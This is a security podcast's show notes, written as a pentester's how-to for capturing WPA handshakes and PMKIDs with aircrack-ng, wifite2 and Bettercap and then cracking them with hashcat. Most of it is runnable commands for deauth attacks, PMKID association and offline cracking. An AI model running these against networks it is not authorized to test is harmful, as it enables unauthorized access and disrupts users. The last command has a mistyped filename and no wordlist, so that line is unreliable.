7MS #505: Pwning Wifi PSKs and PMKIDs with Bettercap
3 min read

7MS #505: Pwning Wifi PSKs and PMKIDs with Bettercap

Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap).

For some background, I found that the Alfa Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi Adapter w/2x 5dBi External Antennas – 2.4GHz 300Mbps/5GHz 867Mbps – 802.11ac & A, B, G, N works really well to hook up to a pentest dropbox. Be sure to follow this video to get the drivers installed. Then also be sure to follow this video to add the USB wifi card to your Kali VM. And I can't remember exactly, but I think I ran into an issue where the Alfa card light wouldn't come on unless the USB device was added in ESXi and the drivers were installed. But don't quote me on that.

Old way I used to pwn PSKs

Reference this BPATTY article for more specifics, but here's the skinny:

# Kill processes on the Kali VM that might screw stuff up:
airmon-ng check kill

# Start monitoring on the wifi card:
sudo airmon-ng start wlan0

# Find APs to attack:
sudo airodump-ng mon0

# Start listening for a handshake:
sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w name-of-file-to-output mon0

# Start a mass disassociation to speed up the handshake capture:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

The current way I pwn PSKs

I find wifite2 (not wifite1) works really well for this. Run the wifite2.py, you’ll get a list of SSIDs in the air space, and you can simply choose which one to attack. Now where this gets a bit annoying is if you’re in a place where there are tons of access points, the network names can end up scrolling off the screen faster than you can catch them before the next refresh. Not a big deal, because you can just hit Ctrl+C to stop the list. However, and this is probably just a me thing, the Ctrl+C combo would not work for me! I'd hit it once, the SSID refresh would not stop, and then once I hit it again, the Wifite2 would stop altogether. I tried every variation of running Wifite2 that I could think of, but this happened each and every time.

So I started searching for what people were using for Wi-Fi handshake capturing, and that’s when I came across an article saying one pen tester swore by Bettercap. Now if you remember back in 2016 we had episode #228 called Fun with Bettercap, and in that one we demonstrated a wired MITM attack. Well, unbeknownst to me, it also has wifi tricks up its sleeve! And those tricks made my testing a snap, especially because I was able to do an attack that didn’t involve clients being joined to the AP at all.

Pwning PSKs and PMKIDs with Bettercap:

The main (and awesome!) article to read on wifi fun with Bettercap is this one. Below is my quick reference guide for pwning all the wifi things quickly:

# Download and run Bettercap via Docker:
sudo docker pull bettercap/bettercap
sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0

# Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function):
set wifi.handshakes.file ~captures.pcap

# Start wifi interface in monitor mode and start channel hopping on all supported frequencies:
wifi.recon on 

# Sort networks by # of clients connected 
set wifi.show.sort clients desc

# Every second, clear out our view and then present an updated list of nearby WiFi networks:
set ticker.commands 'clear; wifi.show'

# Turn the "ticker" GUI on:
ticker on

# Show networks that ONLY start with 7MS:
set wifi.show.filter ^7MS

# Narrow down attack channel, such as channel 1:
wifi.recon.channel 1

# If you find an AP you want to do a deauth attack against, do it like so:
wifi.deauth e0:xx:xx:xx:xx:xx

# Or, if you want grab PMKIDs from APs in the airspace:
wifi.assoc all

# Then you can grab handshakes/PMKIDs from the Docker image.  First list the Docker IDs:
sudo docker ps

# Make note of the ID (noted with "XXX" below).  If you didn't change the default path, you should be able to see captured files in the /root folder.  Try listing them with:
sudo docker exec XXX ls /root/

# Now you can copy them out of the docker and into your current folder:
sudo docker cp XXX:/root/~captures.pcap .

# Now convert the handshakes with cap2hccapx.bin, which you can get at: https://hashcat.net/wiki/doku.php?id=hashcat_utils. 
sudo /usr/lib/hashcat-utils/cap2hccapx.bin captures.pcap converted-file.hccapx

# And finally, crack with hashcat:
sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt

# For PKMIDs, copy the captures.pcap file over, and then convert PMKIDs like so:
sudo /usr/bin/hcxpcaptool -z pmkid-file.pmkid captures.pcap

# Then crack with hashcat:
sudo /path/to/hashcat -m16800 pmkid-file.pkmid